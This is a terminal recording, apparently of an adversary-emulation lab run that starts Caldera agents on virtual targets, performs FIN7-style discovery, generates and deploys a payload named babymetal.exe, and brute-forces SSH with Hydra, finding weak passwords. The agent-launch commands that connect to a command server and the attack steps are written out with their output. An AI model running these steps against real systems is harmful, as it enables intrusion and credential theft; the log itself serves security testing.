[47.114214, "o", "ome/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\nRequirement already satisfied: websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (8.1)\r\nRequirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\nRequirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\nRequirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\nRequirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\nRequirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\nRequirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/p"]
|
||||
[47.114265, "o", "ython3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\nRequirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\nRequirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\nRequirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\nRequirement already satisfied: lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) (4.5.2)\r\nRequirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\nRequirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\nRequirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-pac"]
|
||||
[47.114305, "o", "kages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\nRequirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\nRequirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\nRequirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\nRequirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\nRequirement already satisfied: requests>=2.5.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.24.0)\r\nRequirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\nRequirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx=="]
|
||||
[47.114341, "o", "3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\nRequirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\nRequirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\nRequirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.1.0)\r\nRequirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\nRequirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\nRequirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\nRequirement already satisfied: sphinxcontrib-jsmath in /home/vagrant/.local/lib/"]
|
||||
[47.114379, "o", "python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\nRequirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\nRequirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.5)\r\nRequirement already satisfied: docutils>=0.12 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.16)\r\nRequirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\nRequirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\nRequirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (li"]
|
||||
[47.114445, "o", "ne 14)) (0.57.0)\r\nRequirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\nRequirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\nRequirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\nRequirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\nRequirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\nfatal: destination path 'caldera' already exists and is not an empty directory.\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\nfatal: destination path 'caldera' already"]
|
||||
[47.114492, "o", " exists and is not an empty directory.\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"]
|
||||
[47.29882, "o", "None\r\n"]
|
||||
[57.386237, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"]
|
||||
[57.39097, "o", "\u001b[94mpreparing target target2 ....\u001b[0m\r\n"]
|
||||
[57.394121, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"]
|
||||
[57.394259, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"]
|
||||
[58.061945, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"]
|
||||
[58.062104, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"]
|
||||
[365.815169, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"]
|
||||
[366.127765, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"]
|
||||
[366.43231, "o", " 1 file(s) copied.\r\r\n"]
|
||||
[366.448343, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"]
|
||||
[366.528428, "o", "\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 3 STOP_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x1\r\r\n WAIT_HINT : 0x2bf20\r\r\n"]
|
||||
[366.549334, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 3 STOP_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x1\r\r\n WAIT_HINT : 0x2bf20\r\n\r\n(no stderr)\r\n"]
|
||||
[371.585517, "o", " 1 file(s) copied.\r\r\n"]
|
||||
[371.608795, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"]
|
||||
[371.666169, "o", " 1 file(s) copied.\r\r\n"]
|
||||
[371.681221, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"]
|
||||
[371.746656, "o", " 1 file(s) copied.\r\r\n"]
|
||||
[371.760721, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"]
|
||||
[371.830233, "o", "The operation completed successfully.\r\r\r\n"]
|
||||
[371.847954, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"]
|
||||
[371.922877, "o", "The operation completed successfully.\r\r\r\n"]
|
||||
[371.942729, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nThe operation completed successfully.\r\n\r\nDebug: Stderr: The operation completed successfully.\r\n"]
|
||||
[372.015059, "o", "The operation completed successfully.\r\r\r\n"]
|
||||
[372.03526, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nThe operation completed successfully.\r\n\r\nDebug: Stderr: The operation completed successfully.\r\n"]
|
||||
[374.191468, "o", "\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 2 START_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x0\r\r\n WAIT_HINT : 0x7d0\r\r\n PID : 984\r\r\n FLAGS : \r\r\n"]
|
||||
[374.612598, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 2 START_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x0\r\r\n WAIT_HINT : 0x7d0\r\r\n PID : 984\r\r\n FLAGS :\r\n\r\n(no stderr)\r\n"]
|
||||
[376.733509, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[441.799386, "o", "\u001b[92mTarget is up: target2 \u001b[0m\r\n\u001b[94mpreparing target target3 ....\u001b[0m\r\n"]
|
||||
[441.802436, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"]
|
||||
[441.802622, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"]
|
||||
[445.219168, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"]
|
||||
[445.219374, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"]
|
||||
[612.735313, "o", "\u001b[92mTarget is up: target3 \u001b[0m\r\n"]
|
||||
[613.105912, "o", "The account already exists.\r\r\n\r\r\n"]
|
||||
[613.106507, "o", "More help is available by typing NET HELPMSG 2224.\r\r\n"]
|
||||
[613.106678, "o", "\r\r\n"]
|
||||
[613.377246, "o", "The account already exists.\r\r\n\r\r\n"]
|
||||
[613.377462, "o", "More help is available by typing NET HELPMSG 2224.\r\r\n"]
|
||||
[613.377569, "o", "\r\r\n"]
|
||||
[613.651823, "o", "The account already exists.\r\r\n\r\r\nMore help is available by typing NET HELPMSG 2224.\r\r\n"]
|
||||
[613.651996, "o", "\r\r\n"]
|
||||
[613.919243, "o", "The account already exists.\r\r\n"]
|
||||
[613.919426, "o", "\r\r\nMore help is available by typing NET HELPMSG 2224.\r\r\n"]
|
||||
[613.91954, "o", "\r\r\n"]
|
||||
[614.175234, "o", "System error 1378 has occurred.\r\r\n"]
|
||||
[614.175403, "o", "\r\r\nThe specified account name is already a member of the group.\r\r\n"]
|
||||
[614.17558, "o", "\r\r\n"]
|
||||
[614.426216, "o", "System error 1378 has occurred.\r\r\n"]
|
||||
[614.426371, "o", "\r\r\n"]
|
||||
[614.426466, "o", "The specified account name is already a member of the group.\r\r\n"]
|
||||
[614.426641, "o", "\r\r\n"]
|
||||
[614.687573, "o", "System error 1378 has occurred.\r\r\n\r\r\nThe specified account name is already a member of the group.\r\r\n"]
|
||||
[614.687686, "o", "\r\r\n"]
|
||||
[614.952564, "o", "System error 1378 has occurred.\r\r\n"]
|
||||
[614.952665, "o", "\r\r\n"]
|
||||
[614.952793, "o", "The specified account name is already a member of the group.\r\r\n"]
|
||||
[614.95295, "o", "\r\r\n"]
|
||||
[615.211853, "o", "The operation completed successfully.\r\r\r\n"]
|
||||
[615.230597, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"]
|
||||
[615.69261, "o", "\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\r\n"]
|
||||
[615.692721, "o", "\r\r\n"]
|
||||
[615.731812, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\n\r\n(no stderr)\r\n"]
|
||||
[615.768572, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[615.871724, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[615.894056, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[615.94657, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[616.252327, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"]
|
||||
[616.522501, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"]
|
||||
[616.77925, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[616.88319, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[616.968447, "o", "[SC] StartService FAILED 1056:\r\r\n\r\r\nAn instance of the service is already running.\r\r\n\r\r\n"]
|
||||
[617.223748, "o", "[SC] StartService FAILED 1056:\r\r\n\r\r\nAn instance of the service is already running.\r\r\n\r\r\n"]
|
||||
[619.574809, "o", "Executing (Win32_Process)->Create()\r\r\r\n"]
|
||||
[619.605721, "o", "Method execution successful.\r\r\r\nOut Parameters:\r\r\ninstance of __PARAMETERS\r\r\n{\r\r\n\tProcessId = 4092;\r\r\n\tReturnValue = 0;\r\r\n};\r\r\n"]
|
||||
[619.605843, "o", "\r\r\n"]
|
||||
[619.657522, "o", "Command exited with status 0.\r\n=== stdout ===\r\nExecuting (Win32_Process)->Create()\r\r\r\nMethod execution successful.\r\r\r\nOut Parameters:\r\r\ninstance of __PARAMETERS\r\r\n{\r\r\n\tProcessId = 4092;\r\r\n\tReturnValue = 0;\r\r\n};\r\n\r\n=== stderr ===\r\n\r\n\r\nDebug: Stderr: \r\n"]
|
||||
[624.900179, "o", "cp: './idpx' and '/home/vagrant/idpx' are the same file\r\n"]
|
||||
[625.360739, "o", "cp: './idpx' and '/home/vagrant/idpx' are the same file\r\n"]
|
||||
[625.666636, "o", "None\r\n\u001b[94mStarting Caldera client target2 \u001b[0m\r\n"]
|
||||
[626.241241, "o", "wmic process call create \"%userprofile%\\splunkd.go -server http://192.168.178.132:8888 -group red_windows -paw target2w\" \r\n"]
|
||||
[626.255297, "o", "None\r\n\u001b[92mCaldera client started \u001b[0m\r\n"]
|
||||
[626.255338, "o", "\u001b[92mInitial start of caldera client: target3 \u001b[0m\r\n\u001b[94mStarting Caldera client target3 \u001b[0m\r\n"]
|
||||
[626.264956, "o", "cd /home/vagrant; chmod +x caldera_agent.sh; nohup bash ./caldera_agent.sh\r\n"]
|
||||
[626.266353, "o", "None\r\n\u001b[92mCaldera client started \u001b[0m\r\n"]
|
||||
[626.266412, "o", "\u001b[92mInitial start of caldera client: target3 \u001b[0m\r\n"]
|
||||
[646.285467, "o", "\u001b[94mContacting caldera agents on all targets ....\u001b[0m\r\n"]
|
||||
[646.293778, "o", "\u001b[92mCaldera agents reached\u001b[0m\r\n\u001b[94mRunning Caldera attacks\u001b[0m\r\n"]
|
||||
[646.754051, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221271.460396', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
|
||||
[646.758928, "o", "Got:\r\n"]
|
||||
[646.760695, "o", "[]\r\n"]
|
||||
[646.954014, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: bd527b63-9f9e-46e0-9816-b8434d2b8989 \u001b[0m\r\n\u001b[104m Current User: Obtain user from current session \u001b[0m\r\n"]
|
||||
[687.011907, "o", "'target2w\\\\attackx\\r'\r\n"]
|
||||
[687.313306, "o", "\u001b[94mRestarting caldera server and waiting for clients to re-connect\u001b[0m\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"]
|
||||
[687.345847, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[687.370986, "o", "None\r\n"]
|
||||
[697.460587, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"]
|
||||
[731.612754, "o", "\u001b[92mRestarted caldera server clients re-connected\u001b[0m\r\n"]
|
||||
[732.055067, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221356.779327', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
|
||||
[732.06055, "o", "Got:\r\n"]
|
||||
[732.062419, "o", "[]\r\n"]
|
||||
[732.256434, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target3 Group: red_linux Ability: bd527b63-9f9e-46e0-9816-b8434d2b8989 \u001b[0m\r\n\u001b[104m Current User: Obtain user from current session \u001b[0m\r\n"]
|
||||
[792.342252, "o", "'vagrant'\r\n"]
|
||||
[792.654227, "o", "\u001b[94mRestarting caldera server and waiting for clients to re-connect\u001b[0m\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"]
|
||||
[792.686988, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[792.688926, "o", "None\r\n"]
|
||||
[802.77716, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"]
|
||||
[828.884346, "o", "\u001b[92mRestarted caldera server clients re-connected\u001b[0m\r\n\u001b[92mFinished Caldera attacks\u001b[0m\r\n\u001b[94mRunning Kali attacks\u001b[0m\r\nAttacking machine with PAW: target2w with attack: fin7_1\r\n"]
|
||||
[828.887288, "o", "\u001b[94mStep 1: Initial Breach\u001b[0m\r\n\u001b[92mEnd Step 1: Initial Breach\u001b[0m\r\n\u001b[94mStep 2: Delayed Malware Execution\u001b[0m\r\n\u001b[92mEnd Step 2: Delayed Malware Execution\u001b[0m\r\n"]
|
||||
[828.887345, "o", "\u001b[94mStep 3: Target Assessment\u001b[0m\r\n\u001b[96mnew view \u001b[0m\r\n"]
|
||||
[829.351867, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221454.053941', 'rules': [], 'relationships': [], 'facts': [{'trait': 'remote.host.fqdn', 'value': '192.168.178.189'}]}\r\n"]
|
||||
[829.358865, "o", "Got:\r\n"]
|
||||
[829.360445, "o", "[]\r\n"]
|
||||
[829.55338, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: deeac480-5c2a-42b5-90bb-41675ee53c7e \u001b[0m\r\n\u001b[104m View remote shares: View the shares of a remote host \u001b[0m\r\n"]
|
||||
[869.610888, "o", "('Shared resources at \\\\\\\\192.168.178.189\\r'\r\n '\\r'\r\n '\\r'\r\n '\\r'\r\n 'Share name Type Used as Comment \\r'\r\n '\\r'\r\n '-------------------------------------------------------------------------------\\r'\r\n 'ADMIN$ Disk Remote Admin \\r'\r\n 'C$ Disk Default share \\r'\r\n 'IPC$ IPC Remote IPC \\r'\r\n 'The command completed successfully.\\r'\r\n '\\r')\r\n"]
|
||||
[869.913776, "o", "\u001b[96mget-wmiobject win32_computersystem | fl model\u001b[0m\r\n"]
|
||||
[870.362918, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221495.0803838', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
|
||||
[870.368332, "o", "Got:\r\n"]
|
||||
[870.370061, "o", "[]\r\n"]
|
||||
[870.54879, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 5dc841fd-28ad-40e2-b10e-fb007fe09e81 \u001b[0m\r\n\u001b[104m Virtual or Real: Determine if the system is virtualized or physical \u001b[0m\r\n"]
|
||||
[910.610526, "o", "'\\r\\rmodel : VirtualBox\\r\\r\\r\\r'\r\n"]
|
||||
[910.911601, "o", "\u001b[96mquery USERNAME env\u001b[0m\r\n"]
|
||||
[911.366975, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221536.0781682', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
|
||||
[911.374615, "o", "Got:\r\n"]
|
||||
[911.376091, "o", "[]\r\n"]
|
||||
[911.568012, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: c0da588f-79f0-4263-8998-7496b1a40596 \u001b[0m\r\n\u001b[104m Identify active user: Find user running agent \u001b[0m\r\n"]
|
||||
[961.634485, "o", "'AttackX\\r'\r\n"]
|
||||
[961.922261, "o", "\u001b[96mNetwork configuration discovery. Original is some WMI, here we are using nbstat\u001b[0m\r\n"]
|
||||
[962.354441, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221587.0888445', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
|
||||
[962.361309, "o", "Got:\r\n"]
|
||||
[962.363184, "o", "[]\r\n"]
|
||||
[962.565536, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 14a21534-350f-4d83-9dd7-3c56b93a0c17 \u001b[0m\r\n\u001b[104m Find Domain: Find Domain information \u001b[0m\r\n"]
|
||||
[1022.651477, "o", "(' \\r'\r\n 'Ethernet:\\r'\r\n 'Node IpAddress: [10.0.2.15] Scope Id: []\\r'\r\n '\\r'\r\n ' NetBIOS Local Name Table\\r'\r\n '\\r'\r\n ' Name Type Status\\r'\r\n ' ---------------------------------------------\\r'\r\n ' TARGET2W <00> UNIQUE Registered \\r'\r\n ' WORKGROUP <00> GROUP Registered \\r'\r\n ' TARGET2W <20> UNIQUE Registered \\r'\r\n ' \\r'\r\n 'Ethernet 2:\\r'\r\n 'Node IpAddress: [192.168.178.189] Scope Id: []\\r'\r\n '\\r'\r\n ' NetBIOS Local Name Table\\r'\r\n '\\r'\r\n ' Name Type Status\\r'\r\n "]
|
||||
[1022.651596, "o", "' ---------------------------------------------\\r'\r\n ' TARGET2W <00> UNIQUE Registered \\r'\r\n ' WORKGROUP <00> GROUP Registered \\r'\r\n ' TARGET2W <20> UNIQUE Registered \\r')\r\n"]
|
||||
[1022.975533, "o", "\u001b[96mSystem info discovery, as close as it gets\u001b[0m\r\n"]
|
||||
[1023.474736, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221648.1421063', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
|
||||
[1023.480623, "o", "Got:\r\n"]
|
||||
[1023.482996, "o", "[]\r\n"]
|
||||
[1023.687796, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: b6b105b9-41dc-490b-bc5c-80d699b82ce8 \u001b[0m\r\n\u001b[104m Find OS Version: Find OS Version \u001b[0m\r\n"]
|
||||
[1053.731621, "o", "('\\r'\r\n 'Major Minor Build Revision\\r'\r\n '----- ----- ----- --------\\r'\r\n '10 0 19042 0 \\r'\r\n '\\r'\r\n '\\r')\r\n"]
|
||||
[1054.052628, "o", "\u001b[96mTake screenshot\u001b[0m\r\n"]
|
||||
[1054.464586, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221679.219213', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
|
||||
[1054.469042, "o", "Got:\r\n"]
|
||||
[1054.470495, "o", "[]\r\n"]
|
||||
[1054.651863, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 316251ed-6a28-4013-812b-ddf5b5b007f8 \u001b[0m\r\n\u001b[104m Screen Capture: capture the contents of the screen \u001b[0m\r\n"]
|
||||
[1124.744184, "o", "('Exception calling \"CopyFromScreen\" with \"3\" argument(s): \"The handle is '\r\n 'invalid\"\\r'\r\n 'At line:1 char:252\\r'\r\n '+ ... ge($bmp); $graphics.CopyFromScreen($bounds.Location, [Drawing.Point '\r\n '...\\r'\r\n '+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r'\r\n ' + CategoryInfo : NotSpecified: (:) [], '\r\n 'MethodInvocationException\\r'\r\n ' + FullyQualifiedErrorId : Win32Exception\\r'\r\n ' \\r')\r\n"]
|
||||
[1125.047509, "o", "\u001b[92mEnd Step 3: Target Assessment\u001b[0m\r\n\u001b[94mStep 4: Staging Interactive Toolkit\u001b[0m\r\n\u001b[96mCreate babymetal replacement\u001b[0m\r\n"]
|
||||
[1129.833274, "o", "No encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\n"]
|
||||
[1129.835002, "o", "Saved as: babymetal.exe\r\n"]
|
||||
[1129.880806, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nNo encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\nSaved as: babymetal.exe\r\n\r\nDebug: Stderr: No encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\nSaved as: babymetal.exe\r\n"]
|
||||
[1129.943892, "o", "\u001b[96mGenerated babymetal.exe...deploying it\u001b[0m\r\n"]
|
||||
[1129.994568, "o", "None\r\n"]
|
||||
[1129.994607, "o", "\u001b[96mExecuted payload babymetal.exe on target2 \u001b[0m\r\n\u001b[92mEnd Step 4: Staging Interactive Toolkit\u001b[0m\r\n\u001b[94mStep 5: Escalate Privileges\u001b[0m\r\n\u001b[92mEnd Step 5: Escalate Privileges\u001b[0m"]
|
||||
[1129.994741, "o", "\r\n\u001b[94mStep 6: Expand Access\u001b[0m\r\n\u001b[92mEnd Step 6: Expand Access\u001b[0m\r\n\u001b[94mStep 7: Setup User Monitoring\u001b[0m\r\n\u001b[92mEnd Step 7: Setup User Monitoring\u001b[0m\r\n\u001b[94mStep 8: User Monitoring\u001b[0m\r\n\u001b[92mEnd Step 8: User Monitoring\u001b[0m\r\n\u001b[94mStep 9: Setup Shim Persistence\u001b[0m\r\n\u001b[92mEnd Step 9: Setup Shim Persistence\u001b[0m\r\n\u001b[94mStep 10: Steal Payment Data\u001b[0m\r\n\u001b[92mEnd Step 10: Steal Payment Data\u001b[0m\r\n"]
|
||||
[1134.999777, "o", "Attacking machine with PAW: target3 with attack: hydra\r\n"]
|
||||
[1135.011154, "o", "zsh:cd:1: no such file or directory: None\r\n"]
|
||||
[1135.020669, "o", "\r\nWARNING: apt does not have a stable CLI interface. Use with caution in scripts.\r\n\r\n"]
|
||||
[1135.025903, "o", "Reading package lists..."]
|
||||
[1135.05476, "o", "\r\n"]
|
||||
[1135.056144, "o", "Building dependency tree..."]
|
||||
[1135.180674, "o", "\r\nReading state information..."]
|
||||
[1135.183021, "o", "\r\n"]
|
||||
[1135.34485, "o", "hydra is already the newest version (9.1-1).\r\n0 upgraded, 0 newly installed, 0 to remove and 1389 not upgraded.\r\n"]
|
||||
[1135.399219, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\n"]
|
||||
[1135.39932, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:55:59\r\n"]
|
||||
[1135.399495, "o", "[DATA] max 16 tasks per 1 server, overall 16 tasks, 40 login tries (l:5/p:8), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.145:22/\r\n"]
|
||||
[1135.399547, "o", "[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n"]
|
||||
[1135.898263, "o", "[22][ssh] host: 192.168.178.145 login: test password: test\r\n"]
|
||||
[1138.064322, "o", "[22][ssh] host: 192.168.178.145 login: password password: passw0rd\r\n"]
|
||||
[1143.558955, "o", "[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n"]
|
||||
[1143.559084, "o", "1 of 1 target successfully completed, 2 valid passwords found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:07\r\n"]
|
||||
